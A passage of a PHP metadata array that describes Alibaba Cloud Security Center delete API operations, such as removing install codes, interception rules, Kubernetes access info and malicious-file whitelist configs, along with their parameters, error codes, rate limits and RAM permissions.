['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DeleteInstallCode' => [ 'summary' => 'Deletes an installation code.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'CaptchaCode', 'in' => 'query', 'schema' => ['description' => 'The installation code.'."\n" .'>You can call the [DescribeInstallCodes](~~DescribeInstallCodes~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '1q****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete an installation code', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteInstallCode'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteInstallCode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8\\"\\n}","type":"json"}]', ], 'DeleteInterceptionRule' => [ 'summary' => 'Deletes a microsegmentation interception rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster that you want to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'cdf629147cc3747d292a3f587xxxxxxxx', 'title' => ''], ], [ 'name' => 'RuleIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the rules that you want to delete.', 'type' => 'array', 'items' => ['description' => 'The ID of the rule to delete.'."\n" .'> You can call the [ListInterceptionRulePage](~~ListInterceptionRulePage~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '11', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53CXXXXX', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete an interception rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteInterceptionRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteInterceptionRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53CXXXXX\\"\\n}","type":"json"}]', ], 'DeleteInterceptionTarget' => [ 'summary' => 'Deletes active network objects from the container firewall.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'TargetIds', 'in' => 'query', 'schema' => ['description' => 'The list of network object IDs to delete.'."\n" .'> You can call the [ListInterceptionTargetPage](~~ListInterceptionTargetPage~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '1,11,111', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Result' => ['description' => 'Indicates whether the network objects were deleted. Valid values:'."\n" .'- **true**: The network objects were deleted.'."\n" .'- **false**: The network objects failed to be deleted.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D81DD78E-E006-5C65-A171-C8CB09XXXXX', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete interception targets', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteInterceptionTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteInterceptionTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Result\\": true,\\n \\"RequestId\\": \\"D81DD78E-E006-5C65-A171-C8CB09XXXXX\\"\\n}","type":"json"}]', ], 'DeleteK8sAccessInfo' => [ 'summary' => 'Deletes Kubernetes access information.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '144575', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The default value generated when accessing Kubernetes. You can obtain the ID by calling the [GenerateK8sAccessInfo](~~2623602~~) operation.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '200', 'title' => ''], ], [ 'name' => 'AliyunYundunGatewayProjectName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and can be ignored.', 'type' => 'string', 'default' => 'Sas', 'required' => false, 'example' => 'None', 'title' => ''], ], [ 'name' => 'AliyunYundunGatewayPopName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and can be ignored.', 'type' => 'string', 'default' => 'Sas.2018-12-03.DeleteK8sAccessInfo', 'required' => false, 'example' => 'None', 'title' => ''], ], [ 'name' => 'AliyunYundunGatewayApiName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and can be ignored.', 'type' => 'string', 'default' => 'DeleteK8sAccessInfo', 'required' => false, 'example' => 'None', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The processing result. Valid values:'."\n" ."\n" .'- **true**: Succeeded.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The unique request ID generated by Alibaba Cloud for this request.', 'type' => 'string', 'example' => 'C5338DE5-5D80-51A1-B330-98300AFB80E9', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete kubernetes access information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteK8sAccessInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteK8sAccessInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"C5338DE5-5D80-51A1-B330-98300AFB80E9\\"\\n}","type":"json"}]', ], 'DeleteLoginBaseConfig' => [ 'summary' => 'Deletes the basic configuration information from the logon security configurations for a specific asset.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91966', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the logon security settings to delete. Valid values:'."\n" ."\n" .'* **login\\_common_ip**: approved logon IP addresses'."\n" .'* **login\\_common_time**: approved logon time ranges'."\n" .'* **login\\_common_account**: approved logon accounts'."\n" .'* **login\\_common_location**: approved logon locations', 'type' => 'string', 'required' => true, 'example' => 'login_common_time', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The content of the logon security settings to delete. The content varies based on the type of the logon security settings. Valid values:'."\n" ."\n" .'* **login\\_common_ip**: approved logon IP addresses'."\n" ."\n" .'Example: {"ip":"10.23.23.23"}.'."\n" ."\n" .'* **login\\_common_time**: approved logon time ranges'."\n" ."\n" .'Example: {"startTime":"06:00:00","endTime":"16:00:00"}.'."\n" ."\n" .'* **login\\_common_account**: approved logon accounts'."\n" ."\n" .'Example: {"account":"test_account\\_001"}.'."\n" ."\n" .'* **login\\_common_location**: approved logon locations'."\n" ."\n" .'Example: {"location":"Shanghai"}.', 'type' => 'string', 'required' => true, 'example' => '{"startTime":"06:00:00","endTime":"16:00:00"}', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server whose logon security settings you want to delete.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.', 'type' => 'string', 'required' => false, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], ], 'description' => 'The data returned.', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'GroupOrGlobalConfig', 'errorMessage' => 'Group or global config.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\"\\n}","errorExample":""},{"type":"xml","example":"\\r\\n 7E0618A9-D5EF-4220-9471-C42B5E92719F\\r\\n","errorExample":""}]', 'title' => 'DeleteLoginBaseConfig', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteLoginBaseConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteLoginBaseConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DeleteMaliciousFileWhitelistConfig' => [ 'summary' => 'Deletes a whitelist rule for agentless detection of sensitive file alerts.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '184428', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the whitelist rule for agentless detection of sensitive file alerts. You can call [ListMaliciousFileWhitelistConfigs](~~ListMaliciousFileWhitelistConfigs~~) to obtain the ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'docRequired' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of a failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a whitelist rule for agentless detection of sensitive file alerts', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteMaliciousFileWhitelistConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteMaliciousFileWhitelistConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'MaliciousFileWhitelistConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:maliciousfilewhitelistconfig/{#ConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DeleteMaliciousNote' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '164850', 'abilityTreeNodes' => ['FEATUREsasON13NY'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'NoteId', 'in' => 'query', 'schema' => ['description' => 'The ID of the note record.'."\n" .'>Call the [ListAgentlessMaliciousFiles](~~ListAgentlessMaliciousFiles~~) operation to obtain this parameter from the NoteId field.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53CXXXXX', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete an agentless detection note', 'summary' => 'Deletes a note for an agentless detection alert event.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteMaliciousNote'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteMaliciousNote', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53CXXXXX\\"\\n}","type":"json"}]', ], 'DeleteMonitorAccount' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91967', 'abilityTreeNodes' => ['FEATUREsasFVYNUW'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member account that you want to delete from the Security Center monitoring account list.'."\n" ."\n" .'> You can invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the list of member accounts IDs that are managed by Security Center.', 'type' => 'string', 'required' => true, 'example' => '1840517068******', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. China Chinese Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a security center monitoring account from multi-account security management', 'summary' => 'Deletes a Security Center monitoring account from the multi-account security management feature.', 'description' => 'Call this operation by using the management account of the resource directory or the delegated administrator account of Security Center.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteMonitorAccount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteMonitorAccount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\"\\n}","type":"json"}]', ], 'DeleteOpaStrategyNew' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'high', 'chargeType' => 'free', 'abilityTreeCode' => '174286', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'StrategyIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of policy IDs.', 'type' => 'array', 'items' => ['description' => 'The policy ID.'."\n" .'>Call the [ListOpaClusterStrategyNew](~~2623574~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '101', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'The result status of the API call. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '8FD58F11-0F4D-5C7F-B9B2-CFD76108F9A4', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a risky image blocking policy', 'summary' => 'Deletes a risky image blocking policy.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteOpaStrategyNew'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteOpaStrategyNew', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"RequestId\\": \\"8FD58F11-0F4D-5C7F-B9B2-CFD76108F9A4\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DeleteOssScanConfig' => [ 'summary' => 'Deletes the configuration of an Object Storage Service (OSS) file detection policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '197413', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The configuration ID.'."\n" ."\n" .'> You can call the [ListOssScanConfig](~~ListOssScanConfig~~) operation to query configuration IDs.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1589', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidId', 'errorMessage' => 'Invalid ID.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****\\"\\n}","type":"json"}]', 'title' => 'DeleteOssScanConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteOssScanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteOssScanConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'OssScanConfig', 'arn' => 'acs:yundun-sas:*:{#accountId}:ossscanconfig/{#ConfigId}'], ], ], ], ], ], 'DeletePrivateRegistry' => [ 'summary' => 'Deletes a private image repository by image repository ID.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91970', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RegistryId', 'in' => 'query', 'schema' => ['description' => 'The image repository ID.'."\n" .'>Call the [PageImageRegistry](~~PageImageRegistry~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '22233', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The returned data. Valid values:'."\n" .'- **true**: Succeeded.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '818E3B38-F018-50FF-9A85-5A521747****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a private repository', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeletePrivateRegistry'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeletePrivateRegistry', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"818E3B38-F018-50FF-9A85-5A521747****\\"\\n}","type":"json"}]', ], 'DeleteSasContainerWebDefenseRule' => [ 'summary' => 'Deletes a container tamper-proofing rule.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => ['operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n" .'> You can call the ListContainerWebDefenseRule operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '400597', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Delete a container tamper-proofing rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteSasContainerWebDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteSasContainerWebDefenseRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All 